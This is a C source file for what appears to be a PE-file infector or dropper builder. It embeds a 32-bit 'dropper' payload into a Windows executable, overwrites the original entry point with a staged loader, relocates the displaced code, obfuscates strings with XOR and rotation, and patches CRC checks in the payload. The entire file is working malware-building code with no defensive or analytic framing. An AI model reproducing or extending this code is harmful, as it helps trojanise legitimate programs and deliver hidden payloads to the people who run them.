/**
 *	Loader.c
 **/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "drop.h"
#include "polym.h"
#include "bit.h"
#include "hde.h"

extern char _x86_pe_32[];		// PE.dropper.32
extern int _x86_pe_32_size;		// size 11826
extern char _x86_pe_32_dbg[];	// PE.dropper.32.debug
extern int _x86_pe_32_dbg_size; // size 7867

#define __NODEBUG__
//#undef __NODEBUG__

#ifdef __cplusplus
	extern "C" {
#endif
	DWORD __stdcall crc_calc(DWORD offset, unsigned long size);
	
	//DWORD crctable;

#ifdef __cplusplus
	}
#endif

#ifdef __NODEBUG__
	#define _INDEX_ORIGINALHEADERSIZE	0x2a4e
	#define _INDEX_ORIGINALCODE			0x2a56
	#define _INDEX_ORIGINALCODESIZE		0x2a5e
	#define	_INDEX_ORIGINALEP			0x2a66
	#define _INDEX_ADDRORIGINALHEADER	0x2a6e
	#define	_INDEX_ENTRYPOINTOFFSET		0x2a76
	#define _INDEX_ORIGINALFILESIZE		0x29a7
	#define _INDEX_UNPACKDIR			0x80
	#define _INDEX_WSPRINTFSTR			0x2F8
	#define _INDEX_XOR					0x1300
	#define _SIZE_LDR_DATA				0x40a

#else
	#define _INDEX_ORIGINALHEADERSIZE	0x1ad9
	#define _INDEX_ORIGINALCODE			0x1ae1
	#define _INDEX_ORIGINALCODESIZE		0x1ae9
	#define	_INDEX_ORIGINALEP			0x1af1
	#define _INDEX_ADDRORIGINALHEADER	0x1af9
	#define	_INDEX_ENTRYPOINTOFFSET		0x1b01

	#define _INDEX_ORIGINALFILESIZE		0x1a32
	#define _INDEX_UNPACKDIR			0x80
	#define _INDEX_WSPRINTFSTR			0x2F8
	#define _INDEX_XOR					0x8db
	#define _SIZE_LDR_DATA				0x40a
#endif

static DWORD *OriginalHeaderSize;		// *
static DWORD *OriginalFileSize;			// *
static DWORD *EntryPointOffset;			// *
static DWORD OEPRva;					
static DWORD OldCodeOffs;				
static DWORD OldCodeSize;
static DWORD *OriginalCodeSize;			// *
static DWORD *OriginalEP;				// *
static DWORD NextStageOff;
static DWORD NextStageRVA;
static DWORD RealLdrRVA;
static DWORD *OriginalCode;				// *
static DWORD *OriginalAddrHeader;		//

unsigned char *PtrCode = NULL;
unsigned int PtrSize = 0;

// EncryptString
void EncryptString(char *ptr, size_t size)
{
	unsigned int i;

	if (size == 0) size = strlen(ptr);

	for(i = 0; i < size; i++) {
		ptr[i] = ROL8(ptr[i] ^ 0x44,3);
	}
}

void PrepareRealLoader(LoaderInfo *info)
{
	PEInfoPtr pInfo;
	unsigned int i;

	pInfo = info->pPEInfo;

	*OriginalCode = OffsetToRva(OldCodeOffs, pInfo->ImageNtHeaders);
	*OriginalCodeSize = OldCodeSize;
	*OriginalEP = OEPRva;

	for(i=0; i < strlen(info->UnpackDir); i++)
		PtrCode[_INDEX_UNPACKDIR+i] = info->UnpackDir[i];

	EncryptString(&PtrCode[_INDEX_UNPACKDIR], 257);
	EncryptString(&PtrCode[_INDEX_WSPRINTFSTR], 13);

	for(i=0; i < PtrSize; i++) {
		unsigned long *ptr = (unsigned long*) &PtrCode[i];
		if (*ptr == 0x00801f0f) {
			unsigned long s = PtrCode[i+7] + (PtrCode[i+8] << 8);
			DWORD crcVal = crc_calc((DWORD)(&PtrCode[i+0x0d]), s);
			memcpy(&PtrCode[i+3], &crcVal, sizeof(crcVal));

		}
	}
}

//extern BOOL IsRelocated(DWORD address, PEInfo *pPEInfo, short size);

/***
 *	Calc new size for payload
 ***/
/*
void MeltIntoOEP(BYTE *originalOEP, BYTE *payload, int payloadSize, PEInfo *pPEInfo, DWORD RVAOFFSET)
{
	HDE_STRUCT eip;
	HDE_STRUCT payloadeip;
	
	while(payloadSize > 0) {
		int requiredBytes = 0;
		if (*payload == 0xEB) {
			requiredBytes = 3;
		} else {
			hde_disasm(payload, &payloadeip);

			requiredBytes = payloadeip.len;
		}

		do
		{
			hde_disasm(originalOEP, &eip);
			originalOEP += eip.len;
			RVAOFFSET += eip.len;
		} while(IsRelocated(RVAOFFSET, pPEInfo, eip.len) == FALSE);
	
		payload += requiredBytes;
		payloadSize -= payloadeip.len;

	}
	
	hde_disasm(originalOEP, &eip);
}

void CopyMeltIntoOEP(BYTE *originalOEP, BYTE *payload, int payloadSize, PEInfo *pPEInfo, DWORD RVAOFFSET)
{
	char *tmpOUT = NULL;

	HDE_STRUCT eip;


}
*/
void PrepareAndCopyLdrs(LoaderInfo *info)
{
	DWORD tmp2, resBuild1, result2, result3, offsetDROP, offsetOEP;
	DWORD destOffset;

	unsigned char tmpBuffer[0x10c];

	NextStageOff = IntervalRand(info->CurrentOffset, info->CurrentOffset+0x64);
	info->CurrentOffset = NextStageOff;

	NextStageRVA = OffsetToRva(info->CurrentOffset, info->pPEInfo->ImageNtHeaders);

#ifdef _CONSOLE
	printf("\nMEMSET tmpBuffer");	fflush(stdout);
#endif

	memset(tmpBuffer, 0x90, sizeof(tmpBuffer));

#ifdef _CONSOLE
	printf("\nInvoke Build1Loader"); fflush(stdout);
#endif

	resBuild1 = Build1Loader(info->pPEInfo, (DWORD)&tmpBuffer, NextStageRVA);
	OldCodeOffs = info->CurrentOffset + 0x70;
	
	result2 = RvaToOffset(info->pPEInfo->ImageNtHeaders->OptionalHeader.AddressOfEntryPoint, info->pPEInfo->ImageNtHeaders);
	result2 += (DWORD)(info->pPEInfo->FileBase);
	
	result3 = OldCodeOffs + (DWORD)(info->pPEInfo->FileBase);
	/* Transfer old OEP to dropper...
	*/
	memcpy((void*)result3, (void*)(result2), resBuild1);

	offsetOEP = RvaToOffset(OEPRva, info->pPEInfo->ImageNtHeaders) + (DWORD)(info->pPEInfo->FileBase);

	memcpy((void*)offsetOEP, tmpBuffer, resBuild1);
	
	info->CurrentOffset += 0x70;
	info->CurrentOffset += resBuild1;
	OldCodeSize = resBuild1;
	info->CurrentOffset += PtrSize;

	PrepareRealLoader(info);

	offsetDROP = info->CurrentOffset;
	offsetDROP -= PtrSize;
	offsetDROP += (DWORD)(info->pPEInfo->FileBase);
	memcpy((void *)offsetDROP, PtrCode, PtrSize);

	offsetDROP += PtrSize;
	destOffset = (DWORD)info->pPEInfo->FileBase;
	destOffset += (DWORD)info->pPEInfo->EntryPointOffset;

	memcpy((void *)offsetDROP, info->pPEInfo->OldEntryBackup, info->pPEInfo->oldHeaderSize);

	tmp2 = info->CurrentOffset - PtrSize;
	RealLdrRVA = OffsetToRva(tmp2, info->pPEInfo->ImageNtHeaders);

	Build15Loader(info->pPEInfo, NextStageOff + 0x15 + (DWORD)info->pPEInfo->FileBase, RealLdrRVA, PtrSize, _SIZE_LDR_DATA);
}


BOOL __stdcall ContinueWork(LoaderInfo *info, DWORD xor)
{
	PEInfoPtr pInfo;
	PIMAGE_NT_HEADERS pNTHeaders;; 

#ifdef __NODEBUG__
	PtrCode = malloc(_x86_pe_32_size);
	memcpy(PtrCode, _x86_pe_32, _x86_pe_32_size);
	PtrSize = _x86_pe_32_size;
#else
	PtrCode = _x86_pe_32_dbg;
	PtrSize = _x86_pe_32_dbg_size;
#endif

	OriginalHeaderSize = (DWORD *)(PtrCode + _INDEX_ORIGINALHEADERSIZE);
	OriginalFileSize = (DWORD *)(PtrCode + _INDEX_ORIGINALFILESIZE);
	EntryPointOffset = (DWORD *)(PtrCode + _INDEX_ENTRYPOINTOFFSET);
	OriginalCodeSize = (DWORD *)(PtrCode + _INDEX_ORIGINALCODESIZE);
	OriginalEP = (DWORD *)(PtrCode + _INDEX_ORIGINALEP);
	OriginalCode = (DWORD *)(PtrCode + _INDEX_ORIGINALCODE);
	OriginalAddrHeader = (DWORD *)(PtrCode + _INDEX_ADDRORIGINALHEADER);

	if (info == NULL)		// Invalid pointer
		return 0;

	pInfo = info->pPEInfo;
	pNTHeaders = pInfo->ImageNtHeaders;
	PtrCode[_INDEX_XOR] = (unsigned char)(xor & 0xff);

	*OriginalHeaderSize = pInfo->oldHeaderSize;
	*OriginalFileSize = pInfo->fileSize;
	*EntryPointOffset = pInfo->EntryPointOffset;
	//*OriginalAddrHeader = pInfo->
	OEPRva = pInfo->ImageOptionalHeader->AddressOfEntryPoint;


	//
	PrepareAndCopyLdrs(info);

	// TRANSFER!
	//memcpy(PtrCode + _INDEX_OLDCODESIZE, &OldCodeSize, sizeof(DWORD));
	//memcpy(PtrCode + _INDEX_ORIGINALCODESIZE, &OriginalCodeSize, sizeof(DWORD));
	
	return 1;
}
